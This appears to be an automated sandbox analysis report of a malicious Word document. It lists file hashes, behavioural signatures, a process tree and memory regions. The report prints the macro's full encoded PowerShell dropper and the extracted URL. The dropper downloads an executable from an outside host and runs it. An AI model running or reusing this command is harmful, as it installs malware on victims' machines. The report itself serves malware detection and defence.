Analysis

  • max time kernel
    103s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    21-03-2023 13:20

General

  • Target

    document.doc

  • Size

    75KB

  • MD5

    094268e03ab9e2e23f0d24554cb81a1b

  • SHA1

    3ff029fa49f48408e332c6de54d97d8a43513a5a

  • SHA256

    b6585c308bac3649bba3aba216a3be2e76b0593f03a623ed4bd1fa1dde2b1c4f

  • SHA512

    f9868abc757464fd0f3d43969c532558167edcaa8c92a36e987f9ad37370eb7dd0a2e18e7acca00ce20d714ac9f7237f967e3094d3451fb357632ea5c9867635

  • SSDEEP

    1536:7SI96yzqU+4PHxmrwQWVOk5QL7eS6t5W0pyu0z/:uVyjo8fVT0iS2vp1y/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://m6147keeganpw.info/sp282y/si2s81-19.php?l=rwoq3.dat

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exec Bypass -enc JABpAFYAbwA4ADcAQgB1ACAAPQAgACcAdgBCAGcAVABKACcAOwAkAEcAYwBPAFUAVABhAEYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGkAVgBvADgANwBCAHUAKwAnAC4AZQB4AGUAJwA7ACQAbwA0AGYAOQBVAGQAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAE4AZQBgAFQAYAAuAHcAZQBiAGAAQwBMAGkAZQBOAFQAOwAkAHYAdQBSAEQATwBBAHoAQwA9ACcAaAB0AHQAcAA6AC8ALwBtADYAMQA0ADcAawBlAGUAZwBhAG4AcAB3AC4AaQBuAGYAbwAvAHMAcAAyADgAMgB5AC8AcwBpADIAcwA4ADEALQAxADkALgBwAGgAcAA/AGwAPQByAHcAbwBxADMALgBkAGEAdAAnAC4AcwBwAGwAaQB0ACgAJwAlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEkAUABwAG0ANABOAGkAVwAgAGkAbgAgACQAdgB1AFIARABPAEEAegBDACkAewB0AHIAeQB7ACQAbwA0AGYAOQBVAGQALgBEAG8AdwBOAGwAbwBhAEQAZgBJAGwARQAoACQASQBQAHAAbQA0AE4AaQBXACwAIAAkAEcAYwBPAFUAVABhAEYAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABHAGMATwBVAFQAYQBGACkALgBsAEUATgBHAHQAaAAgAC0AZwBlACAAewBuAHUAbQBiAGUAcgAxAH0AKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAFIAdAAoACQARwBjAE8AVQBUAGEARgApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQANAAoA
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1976
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1944

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      17c06423e5b4ee1c17cc23420461f1b5

      SHA1

      6fa635f08a58002f4b66b1117fa6039e4d7c10ad

      SHA256

      315623aa9d426af6e66c685381c351e5280f2a04e727dc8e0ec7515bfdc677a7

      SHA512

      ff0c66b75431efc002bafe11db3aa2fa7880b06eef4d58cc1c8e0a3e87e2fe64c9b74aed1bf664f0d2c367ec1cb58f7e80d165956059cddc20dbe44b6e26b363

    • memory/1976-68-0x0000000001CA0000-0x0000000001CE0000-memory.dmp
      Filesize

      256KB

    • memory/1976-69-0x0000000001CA0000-0x0000000001CE0000-memory.dmp
      Filesize

      256KB

    • memory/2004-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2004-58-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/2004-59-0x00000000004F0000-0x00000000005F0000-memory.dmp
      Filesize

      1024KB

    • memory/2004-60-0x0000000006110000-0x0000000006210000-memory.dmp
      Filesize

      1024KB

    • memory/2004-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB